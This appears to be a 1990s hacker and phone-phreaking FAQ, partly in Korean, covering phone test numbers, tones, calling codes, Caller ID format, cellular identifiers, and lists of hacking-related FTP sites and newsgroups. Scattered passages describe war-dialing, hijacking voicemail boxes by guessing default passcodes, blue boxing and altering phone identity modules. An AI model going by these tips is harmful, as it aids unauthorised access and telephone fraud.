N 213 xxx-9198 Los Angeles, CA
216 xxx-9887 Akron/Canton/Cleveland/Lorain/Youngstown, OH
303 431-0000 Denver, CO
303 866-8660 Denver, CO
N 310 xxx-1117 Long Beach, CA
N 310 xxx-1118 Long Beach, CA
N 310 xxx-1119 Long Beach, CA
N 310 xxx-9198 Long Beach, CA
316 952-7265 Dodge City/Wichita, KS
501 377-99xx AR
U 719 472-3772 Colorado Springs/Leadville/Pueblo, CO
805 255-0699 Bakersfield/Santa Barbara, CA
N 714 xxx-1117 Anaheim, CA
N 714 xxx-1118 Anaheim, CA
N 714 xxx-1119 Anaheim, CA
N 714 xxx-9198 Anaheim, CA
N 717 292-0009 Harrisburg/Scranton/Wilkes-Barre, PA
N 818 xxx-1117 Pasadena, CA
N 818 xxx-1118 Pasadena, CA
N 818 xxx-1119 Pasadena, CA
N 818 xxx-9198 Pasadena, CA
U 818 885-0699 Pasadena, CA (???-0699 is a pattern)
N 860 525-7078 Hartford, CT
906 632-9999 Marquette/Sault Ste. Marie, MI
906 635-9999 Marquette/Sault Ste. Marie, MI
NPA가 나타나 있지 않다면 LATA 를 포함하지 않고 있을 경우, 119(GTD5 스위치)나 511과 같은 흔한 번호를 시도해 보라.
314 511 Columbia/Jefferson City/St.Louis, MO (1 minute)
404 420 Atlanta, GA (5 minutes)
405 953 Enid/Oklahoma City, OK (1 minute)
U 407 511 Orlando, FL (United Telephone) (1 minute)
N 414 958-0013 Fond du Lac/Green Bay/Milwaukee/Racine, WI (1 minute)
512 200 Austin/Corpus Christi, TX (1 minute)
516 480 Hempstead/Long Island, NY (1 minute)
603 980 NH
614 xxx-9894 Columbus/Steubenville, OH
805 119 Bakersfield/Santa Barbara, CA (3 minutes)
919 211 or 511 Durham, NC (10 min - 1 hour)
감시 테스트 장치(Proctor Test Set)은 전화 선에 이상을
발견하기 위해서 전화회사 직원이 이용하는 도구이다. 감시 테스트
장치에 전화를 걸어서 원하는 테스트를 하기 위한 번호를 누르면 된다.
내가 있는 지역의 감시 테스트 장치는 무엇인가?
NPA가 나타나 있지 않다면, 111이나 117과 같은 흔한
번호를 시도해 보라.
스캐닝이란 흥미로운 반송파(컴퓨터)나 음을 찾기 위해서
엄청나게 많은 전화번호에 전화를 걸어보는 것이다.
스캐닝은 손으로 할 수 있지만, 손으로 하는 것은 지겹고
시간이 매우 오래 걸린다.
더 좋은 방법은 스캐닝 프로그램을 이용하는 것이다.
스캐닝 프로그램은 워 다이얼러(war dialer)이나 디먼 다이얼러(demon
dialer)라고 부른다. 현재, 가장 좋은 워 다이얼러는 PC-DOS에서 사용할
수 있는 ToneLoc으로 Minor Threat와 Mucho Maas가 만든 것이다. ToneLoc은
ftp.paranoia.com/pub/toneloc/에서 ftp로 전송 받을 수 있다.
워 다이얼러는 많은 전화번호에 전화를 걸어서 각 번호에
대한 로그를 남긴다. 그리고 나서 반송파나 톤이 있었던 곳에 다시
전화를 해 볼 수 있다.
2600에서 발췌, 1990년 봄, 27 페이지 :
- 인용시작 -
지역에 따라 스캐닝은 불법이다. 그렇지만, 스캐닝을 했다는 이유로 고소를 하는 것은 매우 힘들다 왜냐하면 스캐닝의 목적이 전화를 한 번호에 대해 단 한 번만 하는 것이기 때문이다. 스캐닝하는 컴퓨터에서 전화를 단 한 번 받은 것을 침해라고 생각하는 사람은 없을 것이다. 어떤 중앙 국에서는 사람들이 스캐닝을 시작하면 이상한 반응을 보인다고 알려져 있다. 때때로, 새키닝을 시작하고 몇 시간이 지나면 다이얼톤(dial tone)이 안 나게 된다고 한다. 그러나, 일정한 정책이 있은 것은 아니다. 먼저 그렇게 해서는 안 된다는 미친(crazy) 법을 찾는 것이 가장 좋을 것 같다. 만일 추측한대로 그런 법이 없다면, 한 번 해 보는 것이다.
- 인용 끝 -
콜로라도 주에서는 스캐닝을 불법으로 규정하는 법이
통과되었음에 유의하자. 통화를 하려는 목적이 아닌 전화는 콜로라도에서는
불법이다.
Contact East
335 Willow Street
North Andover, MA 01845-5995
(508)682-2000
Jensen Tools
7815 S. 46th Street
Phoenix, AZ 85044-5399
(800)426-1194
Specialized Products
3131 Premier Drive
Irving, TX 75063
(800)866-5353
Time Motion Tools
12778 Brookprinter Place
Poway, CA 92064
(619)679-0303
DTMF는 Dual Tone Multi Frequency의 약자이다. 이것은 전화의 숫자판에서 숫자를 누를 때 발생하는 음이다. 이 음은 행과 열의 합만큼이다. ABCD 키는 표준 전화기에는 없다.
1209 1336 1477 1633
697 1 2 3 A
770 4 5 6 B
852 7 8 9 C
941 * 0 # D
Type Hz On Off
---------------------------------------------------------------------
Dial Tone 350 & 440 --- ---
Busy Signal 480 & 620 0.5 0.5
Toll Congestion 480 & 620 0.2 0.3
Ringback (Normal) 440 & 480 2.0 4.0
Ringback (PBX) 440 & 480 1.5 4.5
Reorder (Local) 480 & 620 3.0 2.0
Invalid Number 200 & 400
Hang Up Warning 1400 & 2060 0.1 0.1
Hang Up 2450 & 2600 --- ---
<* (LASS)코드는 모두 무엇인가?
Local Area Signal Service(LASS)와 Custom Calling
Feature Control Code:
(이것들이 표준으로 생각되나, 지역적으로 차이가 있을 수 있다)
(These appear to be standard, but may be changed locally)
Service Tone Pulse/rotary Notes
--------------------------------------------------------------------------
Assistance/Police *12 n/a [1]
Cancel forwarding *30 n/a [C1]
Automatic Forwarding *31 n/a [C1]
Notify *32 n/a [C1] [2]
Intercom Ring 1 (..) *51 1151 [3]
Intercom Ring 2 (.._) *52 1152 [3]
Intercom Ring 3 (._.) *53 1153 [3]
Extension Hold *54 1154 [3]
Customer Originated Trace *57 1157
Selective Call Rejection *60 1160 (or Call Screen)
Selective Distinct Alert *61 1161
Selective Call Acceptance *62 1162
Selective Call Forwarding *63 1163
ICLID Activation *65 1165
Call Return (outgoing) *66 1166
Number Display Blocking *67 1167 [4]
Computer Access Restriction *68 1168
Call Return (incoming) *69 1169
Call Waiting disable *70 1170 [4]
No Answer Call Transfer *71 1171
Usage Sensitive 3 way call *71 1171
Call Forwarding: start *72 or 72# 1172
Call Forwarding: cancel *73 or 73# 1173
Speed Calling (8 numbers) *74 or 74# 1174
Speed Calling (30 numbers) *75 or 75# 1175
Anonymous Call Rejection *77 1177 [5] [M: *58]
Call Screen Disable *80 1180 (or Call Screen) [M: *50]
Selective Distinct Disable *81 1181 [M: *51]
Select. Acceptance Disable *82 1182 [4] [7]
Select. Forwarding Disable *83 1183 [M: *53]
ICLID Disable *85 1185
Call Return (cancel out) *86 1186 [6] [M: *56]
Anon. Call Reject (cancel) *87 1187 [5] [M: *68]
Call Return (cancel in) *89 1189 [6] [M: *59]
Notes:
[C1] - Means code used for Cellular One service
[1] - for cellular in Pittsburgh, PA A/C 412 in some areas
[2] - indicates that you are not local and maybe how to reach you
[3] - found in Pac Bell territory; Intercom ring causes a distinctive
ring to be generated on the current line; Hold keeps a call
connected until another extension is picked up
[4] - applied once before each call
[5] - A.C.R. blocks calls from those who blocked Caller ID
(used in C&P territory, for instance)
[6] - cancels further return attempts
[7] - *82 (1182) has been mandated to be the nationwide code for
"Send CLID info regardless of the default setting on this
phone line."
[M: *xx] - alternate code used for MLVP (multi-line variety package)
by Bellcore. It goes by different names in different RBOCs.
In Bellsouth it is called Prestige. It is an arrangement of
ESSEX like features for single or small multiple line groups.
The reason for different codes for some features in MLVP is that
call-pickup is *8 in MLVP so all *8x codes are reassigned
*5x
1 세대 46/49Mhz 전화의 주파수가 아래에 있다.
Channel Handset Transmit Base Transmit
------- ---------------- -------------
1 49.670mhz 46.610mhz
2 49.845 46.630
3 49.860 46.670
4 49.770 46.710
5 49.875 46.730
6 49.830 46.770
7 49.890 46.830
8 49.930 46.870
9 49.990 46.930
10 49.970 46.970
"900Mhz"의 신세대 무선전화기는 902-228Mhz
사이의 주파수가 할당된다. 30-100Khz의 채널당 여유가 있다.
----------------------------------------------------------------
Panasonic KX-T9000 (60 Channels)
base 902.100 - 903.870 Base frequencies (30Khz spacing)
handset 926.100 - 927.870 Handset frequencies
CH BASE HANDSET CH BASE HANDSET CH BASE HANDSET
-- ------- ------- -- ------- ------- -- ------- -------
01 902.100 926.100 11 902.400 926.400 21 902.700 926.700
02 902.130 926.130 12 902.430 926.430 22 902.730 926.730
03 902.160 926.160 13 902.460 926.460 23 902.760 926.760
04 902.190 926.190 14 902.490 926.490 24 902.790 926.790
05 902.220 926.220 15 902.520 926.520 25 902.820 926.820
06 902.250 926.250 16 902.550 926.550 26 902.850 926.850
07 902.280 926.280 17 902.580 926.580 27 902.880 926.880
08 902.310 926.310 18 902.610 926.610 28 902.910 926.910
09 902.340 926.340 19 902.640 926.640 29 902.940 926.940
10 902.370 926.370 20 902.670 926.670 30 902.970 926.970
31 903.000 927.000 41 903.300 927.300 51 903.600 927.600
32 903.030 927.030 42 903.330 927.330 52 903.630 927.630
33 903.060 927.060 43 903.360 927.360 53 903.660 927.660
34 903.090 927.090 44 903.390 927.390 54 903.690 927.690
35 903.120 927.120 45 903.420 927.420 55 903.720 927.720
36 903.150 927.150 46 903.450 927.450 56 903.750 927.750
37 903.180 927.180 47 903.480 927.480 57 903.780 927.780
38 903.210 927.210 48 903.510 927.510 58 903.810 927.810
39 903.240 927.240 49 903.540 927.540 59 903.840 927.840
40 903.270 927.270 50 903.570 927.570 60 903.870 927.870
------------------------------------------------------------
V-TECH TROPEZ DX900 (20 CHANNELS)
905.6 - 907.5 TRANSPONDER (BASE) FREQUENCIES (100 KHZ SPACING)
925.5 - 927.4 HANDSET FREQUENCIES
CH BASE HANDSET CH BASE HANDSET CH BASE HANDSET
-- ------- ------- -- ------- ------- -- ------- -------
01 905.600 925.500 08 906.300 926.200 15 907.000 926.900
02 905.700 925.600 09 906.400 926.300 16 907.100 927.000
03 905.800 925.700 10 906.500 926.400 17 907.200 927.100
04 905.900 925.800 11 906.600 926.500 18 907.300 927.200
05 906.000 925.900 12 906.700 926.600 19 907.400 927.300
06 906.100 926.000 13 906.800 926.700 20 907.500 927.400
07 906.200 926.100 14 906.900 926.800
------------------------------------------------------------
Other 900mhz cordless phones
AT&T #9120 - - - - - 902.0 - 905.0 & 925.0 - 928.0 MHZ
OTRON CORP. #CP-1000 902.1 - 903.9 & 926.1 - 927.9 MHZ
SAMSUNG #SP-R912- - - 903.0 & 927.0 MHZ
------------------------------------------------------------
This FAQ answer is stolen from Rockwell:
Calling Number Delivery (CND), better known as Caller ID, is a
telephone service intended for residential and small business
customers. It allows the called Customer Premises Equipment (CPE) to
receive a calling party's directory number and the date and time of
the call during the first 4 second silent interval in the ringing
cycle.
Parameters
~~~~~~~~~~
The data signalling interface has the following characteristics:
Link Type: 2-wire, simplex
Transmission Scheme: Analog, phase-coherent FSK
Logical 1 (mark) 1200 +/- 12 Hz
Logical 0 (space) 2200 +/- 22 Hz
Transmission Rate: 1200 bps
Transmission Level: 13.5 +/- dBm into 900 ohm load
Protocol
~~~~~~~~
The protocol uses 8-bit data words (bytes), each bounded by a start
bit and a stop bit. The CND message uses the Single Data Message
format shown below.
| Channel | Carrier | Message | Message | Data | Checksum |
| Seizure | Signal | Type | Length | Word(s) | Word |
| Signal | | Word | Word | | |
Channel Seizure Signal
~~~~~~~~~~~~~~~~~~~~~~
The channel seizure is 30 continuous bytes of 55h (01010101) providing
a detectable alternating function to the CPE (i.e. the modem data
pump).
Carrier Signal
~~~~~~~~~~~~~~
The carrier signal consists of 130 +/- 25 mS of mark (1200 Hz) to
condition the receiver for data.
Message Type Word
~~~~~~~~~~~~~~~~~
The message type word indicates the service and capability associated
with the data message. The message type word for CND is 04h
(00000100).
Message Length Word
~~~~~~~~~~~~~~~~~~~
The message length word specifies the total number of data words to
follow.
Data Words
~~~~~~~~~~
The data words are encoded in ASCII and represent the following
information:
o The first two words represent the month
o The next two words represent the day of the month
o The next two words represent the hour in local military time
o The next two words represent the minute after the hour
o The calling party's directory number is represented by the
remaining words in the data word field
If the calling party's directory number is not available to the
terminating central office, the data word field contains an ASCII "O".
If the calling party invokes the privacy capability, the data word
field contains an ASCII "P".
Checksum Word
~~~~~~~~~~~~~
The Checksum Word contains the twos complement of the modulo 256 sum
of the other words in the data message (i.e., message type, message
length, and data words). The receiving equipment may calculate the
modulo 256 sum of the received words and add this sum to the received
checksum word. A result of zero generally indicates that the message
was correctly received. Message retransmission is not supported.
Example CNS Single Data Message
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
An example of a received CND message, beginning with the message type
word, follows:
04 12 30 39 33 30 31 32 32 34 36 30 39 35 35 35 31 32 31 32 51
04h= Calling number delivery information code (message type word)
12h= 18 decimal; Number of data words (date,time, and directory
number words)
ASCII 30,39= 09; September
ASCII 33,30= 30; 30th day
ASCII 31,32= 12; 12:00 PM
ASCII 32,34= 24; 24 minutes (i.e., 12:24 PM)
ASCII 36,30,39,35,35,35,31,32,31,32= (609) 555-1212; calling
party's directory number
51h= Checksum Word
Data Access Arrangement (DAA) Requirements
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To receive CND information, the modem monitors the phone line between
the first and second ring bursts without causing the DAA to go off
hook in the conventional sense, which would inhibit the transmission
of CND by the local central office. A simple modification to an
existing DAA circuit easily accomplishes the task.
Modem Requirements
~~~~~~~~~~~~~~~~~~
Although the data signalling interface parameters match those of a
Bell 202 modem, the receiving CPE need not be a Bell 202 modem. A
V.23 1200 bps modem receiver may be used to demodulate the Bell 202
signal. The ring indicate bit (RI) may be used on a modem to indicate
when to monitor the phone line for CND information. After the RI bit
sets, indicating the first ring burst, the host waits for the RI bit
to reset. The host then configures the modem to monitor the phone
line for CND information.
Signalling
~~~~~~~~~~
According to Bellcore specifications, CND signalling starts as early
as 300 mS after the first ring burst and ends at least 475 mS before
the second ring burst
Applications
~~~~~~~~~~~~
Once CND information is received the user may process the information
in a number of ways.
1. The date, time, and calling party's directory number can be
displayed.
2. Using a look-up table, the calling party's directory number can be
correlated with his or her name and the name displayed.
3. CND information can also be used in additional ways such as for:
a. Bulletin board applications
b. Black-listing applications
c. Keeping logs of system user calls, or
d. Implementing a telemarketing data base
References
~~~~~~~~~~
For more information on Calling Number Delivery (CND), refer to
Bellcore publications TR-TSY-000030 and TR-TSY-000031.
To obtain Bellcore documents contact:
Bellcore Customer Service
60 New England Avenue, Room 1B252
Piscataway, NJ 08834-4196
(908) 699-5800
Always test as much as possible before relying on any method of blocking
Caller-ID. Some of these methods work in some areas, but not in others.
Dial *67 before you dial the number. (141 in the United Kingdom)
Dial your local TelCo and have them add Caller-ID block to your line.
Dial the 0 Operator and have him or her place the call for you.
Dial the call using a pre-paid phone card.
Dial through Security Consultants at (900)PREVENT for U.S. calls
($1.99/minute) or (900)STONEWALL for international calls ($3.99/minute).
Dial from a pay phone. :-)
PBX는 Private Branch Exchange(구내 교환기)의 약어이다.
PBX는 소형 전화 교환기로 회사가 기관이 소유한다. 천명의 피고용인이
있는 회사를 가정하자. PBX가 없을 경우, 1000개의 전화선이 필요하다.
그렇지만, 10%정도의 사람만이 동시에 전화를 사용한다고 하자. 피고용인이
전화를 할려고 할 때, 이용가능한 외선을 찾아서 연결하는 컴퓨터가
있다면 어떨까? 이런 종류의 시스템이 있다면 전화선 비용의 10분의
1만 부담하면 된다.
VMB는 Voicie Mail Box(음성 메일 박스)의 약자이다.
VMB는 수십만의 사용자에 서비스를 하는 자동 응답기이다. 각 사용자는
자신의 음성 메일 박스를 이 시스템 내에 가지게 된다. 각 메일 박스는
박스 번호와 암호(passcode)를 가지게 된다.
암호가 없이 VMB 시스템에 음성 메시지를 남길 수 있다.
암호가 있으면, 메일박스를 정리하고 메시지를 읽을 수 있다. 때때로,
디폴트로 생성된 메일박스나 더 이상 사용되지 않는 메일박스가 있을
수 있다. 이러한 메일박스를 암호를 추측하여 탈취할 수 있다. 대개
암호는 1234와 같이 흔한 것이다.
ABCD 음(tone)은 DTFM 음에 추가한 것이다. ABCD 음은 미국 군사 전화 망(AutoVon)에서 이용되고, Automatic Call Distributor(ACD)에서 이용되고, PBX의 제어 메시지로, 아마추어 무선의 자동패치(auto-patch)에서 사용된다.
The ABCD tones are simply additional DTFM tones that may be used in any
way the standard (0-9) tones are used. The ABCD tones are used in the
U.S. military telephone network (AutoVon), in some Automatic Call
Distributor (ACD) systems, for control messages in some PBX systems, and
in some amateur radio auto-patches.
In the AutoVon network, special telephones are equipped with ABCD keys.
The ABCD keys are defined as such:
A - Flash
B - Flash override priority
C - Priority communication
D - Priority override
Using a built-in maintenance mode of the Automatic Call Distributor
(ACD) systems once used by Directory Assistance operators, you could
connect two callers together.
The purpose of the Silver Box is to create the ABCD tones.
See also "What are the DTMF Frequencies?"
국제 직접 번호(International Direct Number)란 무엇인가?
The numbers are used so that you may connect to an operator from a
foreign telephone network, without incurring long distance charges.
These numbers may be useful in blue boxing, as many countries still have
older switching equipment in use.
Australia (800)682-2878
Austria (800)624-0043
Belgium (800)472-0032
Belize (800)235-1154
Bermuda (800)232-2067
Brazil (800)344-1055
British VI (800)278-6585
Cayman (800)852-3653
Chile (800)552-0056
China (Shanghai) (800)532-4462
Costa Rica (800)252-5114
Denmark (800)762-0045
El Salvador (800)422-2425
Finland (800)232-0358
France (800)537-2623
Germany (800)292-0049
Greece (800)443-5527
Guam (800)367-4826
HK (800)992-2323
Hungary (800)352-9469
Indonesia (800)242-4757
Ireland (800)562-6262
Italy (800)543-7662
Japan (800)543-0051
Korea (800)822-8256
Macau (800)622-2821
Malaysia (800)772-7369
Netherlands (800)432-0031
Norway (800)292-0047
New Zealand (800)248-0064
Panama (800)872-6106
Portugal (800)822-2776
Philippines (800)336-7445
Singapore (800)822-6588
Spain (800)247-7246
Sweden (800)345-0046
Taiwan (800)626-0979
Thailand (800)342-0066
Turkey (800)828-2646
UK (800)445-5667
Uruguay (800)245-8411
Yugoslavia (800)367-9842 (Belgrade)
367-9841 (Zagreb)
USA from outside (800)874-4000 Ext. 107
MTSO란 Mobile Telephone Switching Office(이동 전화 교환국)를 말한다. MTSO는 개개의 셀
탑(cell tower)를 CO(Central Office; 중앙 교환국)으로
연결한다.
MTSO는 이동 전화의 상대적인 신호 크기를 관찰하여
감도가 제일 좋은 셀타워에서 신호를 받도록 한다.
NAM은 Number Assignment Module(번호지정 모듈)의 약어이다.
NAM은 EPROM이고 MIN이이나 SIDH와 같은 정보를 담고 있다. 이곳에
저장된 정보를 변경하여 무선 전화를 오용할 수 있다.
ESN은 Electronic Serial Number(전자 시리얼 번호)의
약어이다. 이것은 무선전화의 시리얼 번호을 말한다.
MIN은 Mobile Identification Number(이동 식별 번호)를
말한다. 이것은 이동 전화의 전화번호이다.
SCM은 Station Class Mark(국 등급 표시)의 약어이다.
SCM은 3가지의 다른 정보를 포함하는 4비트의 숫자이다. 이동 전화는
셀 타워에 이 정보(와 다른 정보)를 보낸다. 비트 1은 구식 666채널을
사용하는 이동전화인지 아니면 신식 832 채널을 이용하는 이동 전화인지를
셀 타워에 알려준다. 832 채널로 확장은 1988년에 이루어졌다. 비트
2는 이동전화가 이동용 기기(mobild unit)인지 아니면 음성 구동형(voice
activated cellular telephone) 이동전화 인지를 구분한다. 비트 3과
4는 셀 타워에 이동 전화가 송신하는 출력을 알려준다.
SIDH란 System Identification for Home System(가정용 시스템용 시스템 식별)의 약어이다. 이
동 전화에 있는 SIDH는 이동전화 시스템에 어느 지역에서
이동전화를 이용하고 있는지 알려 준다. 이것은 로밍시(가입자의 이동전화를
제공하는 회사가 서비스 할 수 없는 다른 회사가 서비스 할 수 있는
영역에 있을 때)에 이용된다.
어떤 지역에서든 두 개의 SIDH 가 있다. 하나는 유선
반송파(carrier)를 위한 것이고, 다른 하나은 무선 반송파를 위한
것이다. 같은 지역에서 합법적으로 인정된 무선전화 서비스를 제공할
수 있는 두 회사가 있을 수 있다. 유선 반송파는 지역 전화 회사이고,
무선 반송파는 다른 회사가 된다. 유선 SIDH 반송파는 항상 짝수이고
이에 반해 무선 SIDH 반송파는 홀수이다. 유성 반송파는 Side-B 반송파라고
알려져 있다. 그리고 무선 반송파는 Side-A 반송파라고 알려져 있다.
포워드 채널이란 셀 타워가 이동전화에게 보내는 주파수이다.
리버스(reverse) 채널이란 이동 전화가 셀 타워에게 보내는 주파수이다.
포워드 채널은 대개 리버스 채널에 비해 45Mhz 높다.
예를 들어 리버스 채널이 824Mhz라면 포워드 채널은 869Mhz가 된다.
N 204.215.84.2 /pub/dmackey
2600.com (2600 Magazine)
aeneas.mit.edu (Kerberos)
alex.sp.cs.cmu.edu /links/security (Misc)
asylum.sf.ca.us (CyberWarriors of Xanadu)
N atari.archive.umich.edu /pub/atari/Utilities/pgp261st.zip (Atari PGP)
athena-dist.mit.edu /pub/ATHENA (Athena Project)
atlantis.utmb.edu (Anti-virus)
bellcore.com (Bellcore)
cert.org (CERT)
ciac.llnl.gov (CIAC)
clark.net /pub/jcase (H/P)
cnit.nsk.su /pub/security (Security)
coast.cs.purdue.edu /pub (Security/COAST)
coombs.anu.edu.au /pub/security (Security)
csrc.ncsl.nist.gov (NIST Security)
dartmouth.edu /pub/security (Security)
ds.internic.net (Internet documents)
N dutiws.twi.tudelft.nl /pub/novell
etext.archive.umich.edu /pub/Zines/PrivateLine (PrivateLine)
N fastlane.net /pub/nomad
ftp.3com.com /pub/Orange-Book (Orange Book)
ftp.acns.nwu.edu /pub (Mac Anti-virus)
ftp.acsu.buffalo.edu /pub/security & /pub/irc (Security & IRC)
ftp.alantec.com /pub/tcpr (Tcpr)
ftp.armory.com /pub/user/kmartind (H/P)
ftp.armory.com /pub/user/swallow (H/P)
ftp.auscert.org.au /pub (Australian CERT)
ftp.cerf.net /pub/software/unix/security (CERFnet)
ftp.cert.dfn.de (FIRST)
ftp.cisco.com (Cisco)
ftp.commerce.net /pub/standards/drafts/shttp.txt (Secure HyperText)
ftp.cs.colorado.edu
ftp.cs.ruu.nl /pub/SECURITY (Security & PGP)
ftp.cs.uwm.edu /pub/comp-privacy (Privacy Digest)
ftp.cs.vu.nl
ftp.cs.yale.edu
ftp.csi.forth.gr /pub/security
ftp.csl.sri.com /pub/nides (SRI)
ftp.csn.org /mpj (Cryptology)
ftp.csua.berkeley.edu /pub/cypherpunks (Crypto)
ftp.delmarva.com
N ftp.demon.co.uk /pub/misc/0800num.txt (0800/0500 numbers)
ftp.denet.dk /pub/security/tools/satan
ftp.digex.net /pub/access/dunk
ftp.dsi.unimi.it /pub/security/crypt (Crypto)
ftp.dstc.edu.au /pub/security/satan
ftp.ee.lbl.gov
ftp.eff.org /pub/Publications/CuD (EFF)
ftp.elelab.nsc.co.jp /pub/security (Security)
ftp.etext.org (Etext)
ftp.fc.net /pub/deadkat (TNO)
ftp.fc.net /pub/defcon (DefCon)
ftp.fc.net /pub/defcon/BBEEP (BlueBeep)
ftp.fc.net /pub/phrack (Phrack)
ftp.foobar.com
ftp.funet.fi /pub/doc/CuD
ftp.gate.net /pub/users/laura
ftp.gate.net /pub/users/wakko
ftp.giga.or.at /pub/hacker/ (H/P)
ftp.greatcircle.com /pub/firewalls (Firewalls)
ftp.IEunet.ie /pub/security (Security)
ftp.ifi.uio.no
ftp.indirect.com /www/evildawg/public_access/C&N/
ftp.info.fundp.ac.be
ftp.informatik.uni-hamburg.de
ftp.informatik.uni-kiel.de /pub/sources/security
ftp.inoc.dl.nec.com /pub/security (Security)
ftp.isi.edu
ftp.lava.net /users/oracle/ (H/P
N ftp.leo.org/pub/com/os/os2/crypt
ftp.lerc.nasa.gov /security
ftp.llnl.gov /pub (CIAC)
ftp.luth.se /pub/unix/security
ftp.lysator.liu.se
ftp.mcs.anl.gov /pub/security
ftp.microserve.net /ppp-pop/strata/mac (Mac)
ftp.near.net /security/archives/phrack (Zines)
ftp.nec.com
ftp.net.ohio-state.edu /pub/security/satan
ftp.netcom.com /pub/br/bradleym (Virii)
ftp.netcom.com /pub/da/daemon9 (H/P)
ftp.netcom.com /pub/fi/filbert
N ftp.netcom.com /pub/gr/grady
N ftp.netcom.com /pub/il/illusion (H/P+Virus)
N ftp.netcom.com /pub/je/jericho (H/P)
ftp.netcom.com /pub/le/lewiz (Social Engineering)
N ftp.netcom.com /pub/ty/tym (TYM)
ftp.netcom.com /pub/va/vandal (DnA)
ftp.netcom.com /pub/wt/wtech/
N ftp.netcom.com /pub/zi/zigweed (H/P)
ftp.netcom.com /pub/zz/zzyzx (H/P)
ftp.netsys.com
ftp.ocs.mq.edu.au /PC/Crypt (Cryptology)
ftp.ox.ac.uk /pub/comp/security
ftp.ox.ac.uk /pub/crypto (Cryptology)
ftp.ox.ac.uk /pub/wordlists (Wordlists)
ftp.paranoia.com /pub/toneloc/tl110.zip (ToneLoc)
N ftp.pipex.net /pub/areacode (uk areacodes)
ftp.pop.psu.edu
ftp.primenet.com /users/i/insphrk
ftp.primenet.com /users/k/kludge (H/P)
ftp.primenet.com /users/s/scuzzy (Copy Protection)
ftp.primus.com /pub/security (Security)
ftp.psy.uq.oz.au
ftp.psy.uq.oz.au /pub/DES
ftp.rahul.net /pub/conquest/DeadelviS/script/vms/
ftp.rahul.net /pub/lps (Home of the FAQ)
ftp.sert.edu.au
ftp.sgi.com
N ftp.smartlink.net /pub/users/mikes/haq
ftp.std.com /archives/alt.locksmithing (Locksmithing)
ftp.std.com /obi/Mischief/ (MIT Guide to Locks)
ftp.std.com /obi/Phracks (Zines)
ftp.sunet.se /pub/network/monitoring (Ethernet sniffers)
ftp.sura.net /pub/security (SURAnet)
ftp.technet.sg
U ftp.technion.ac.il
ftp.tis.com /pub (TIS)
ftp.tisl.ukans.edu /pub/security
ftp.uni-koeln.de (Wordlists)
ftp.uspto.gov
ftp.uu.net /doc/literary/obi/Phracks (Zines)
ftp.uwp.edu /pub/dos/romulus/cracks (Copy Protection)
ftp.vis.colostate.edu
ftp.vix.com
ftp.vortex.com
ftp.warwick.ac.uk /pub/cud (Zines)
ftp.wi.leidenuniv.nl /pub/security
ftp.win.tue.nl /pub/security (Security)
ftp.winternet.com /users/nitehwk (H/P)
ftp.wustl.edu /doc/EFF (EFF)
ftp.zoom.com
ftp.zrz.tu-berlin.de/pub/security/virus/texts/crypto (Cryptology)
garbo.uwasa.fi /pc/crypt (Cryptology)
N gemini.tuc.noao.edu /pub/grandi
gti.net /pub/safetynet
gumby.dsd.trw.com
hack-this.pc.cc.cmu.edu (Down for Summer)
heffer.lab.csuchico.edu (Third Stone From The Sun)
hplyot.obspm.fr
info.mcs.anl.gov
N infonexus.com /pub (The Guild)
jerico.usc.edu
l0pht.com (The L0pht)
lcs.mit.edu /telecom-archives (Telecom archives)
lod.com (Legion of Doom)
mac.archive.umich.edu
mary.iia.org /pub/users/patriot (Misc)
monet.ccs.itd.umich.edu
N net-dist.mit.edu /pub/pgp
net.tamu.edu /pub/security/TAMU (Security)
net23.com /pub (Max Headroom)
nic.ddn.mil /scc (DDN Security)
nic.sura.net /pub/security
oak.oakland.edu /pub/hamradio (Ham Radio)
oak.oakland.edu /SimTel/msdos/sound (DTMF decoders)
oak.oakland.edu /SimTel/msdos/sysutil (BIOS attackers)
parcftp.xerox.com
prism.nmt.edu /pub/misc (Terrorist Handbook)
pyrite.rutgers.edu /pub/security (Security)
relay.cs.toronto.edu /doc/telecom-archives (Telecom)
rena.dit.co.jp /pub/security (Security)
research.att.com /dist/internet_security (AT&T)
ripem.msu.edu /pub/crypt (Ripem)
N rmii.com /pub2/KRaD (KRaD Magazine)
rtfm.mit.edu (Etext)
rtfm.mit.edu /pub/usenet-by-group (Usenet FAQ's)
scss3.cl.msu.edu /pub/crypt (Cryptology)
N sgigate.sgi.com /Security (SGI Security)
sierra.stanford.edu
spy.org (CSC)
N src.doc.ic.ac.uk /usenet/uk.telecom (uk.telecom archives)
suburbia.apana.org.au /pub/unix/security (Security)
sunsolve1.sun.com
theta.iis.u-tokyo.ac.jp /pub1/security (Security)
titania.mathematik.uni-ulm.de /pub/security (Security)
toxicwaste.mit.edu /pub/rsa129/README (Breaking RSA)
ugle.unit.no
unipc20.unimed.sintef.no
vic.cc.purdue.edu
vixen.cso.uiuc.edu /security
N web.mit.edu
whacked.l0pht.com (Mac + H/P)
wimsey.bc.ca /pub/crypto (Cryptology)
N wuarchive.wustl.edu /pub/aminet/util/crypt
None at this time.
alt.2600 Do it 'til it hertz
N alt.2600hz
N alt.2600.codez
N alt.2600.debate
N alt.2600.moderated
alt.cellular
alt.cellular-phone-tech Brilliant telephony mind blow netnews naming
alt.comp.virus An unmoderated forum for discussing viruses
alt.comp.virus.source.code
alt.cracks Heavy toolbelt wearers of the world, unite
alt.cyberpunk High-tech low-life.
alt.cyberspace Cyberspace and how it should work.
alt.dcom.telecom Discussion of telecommunications technology
alt.engr.explosives [no description available]
alt.fan.kevin-mitnick
alt.fan.lewiz Lewis De Payne fan club
alt.hackers Descriptions of projects currently under development
alt.hackintosh
alt.locksmithing You locked your keys in *where*?
alt.hackers.malicious The really bad guys - don't take candy from them
alt.ph.uk United Kingdom version of alt.2600
alt.privacy.anon-server Tech. & policy matters of anonymous contact servers
alt.radio.pirate Hide the gear, here comes the magic station-wagons.
alt.radio.scanner Discussion of scanning radio receivers.
alt.satellite.tv.europe All about European satellite tv
alt.security Security issues on computer systems
alt.security.index Pointers to good stuff in misc.security (Moderated)
alt.security.keydist Exchange of keys for public key encryption systems
alt.security.pgp The Pretty Good Privacy package
alt.security.ripem A secure email system illegal to export from the US
comp.dcom.cellular [no description available]
comp.dcom.telecom Telecommunications digest (Moderated)
comp.dcom.telecom.tech [no description available]
comp.org.cpsr.announce Computer Professionals for Social Responsibility
comp.org.cpsr.talk Issues of computing and social responsibility
comp.org.eff.news News from the Electronic Frontiers Foundation
comp.org.eff.talk Discussion of EFF goals, strategies, etc.
N comp.os.netware.security Netware Security issues
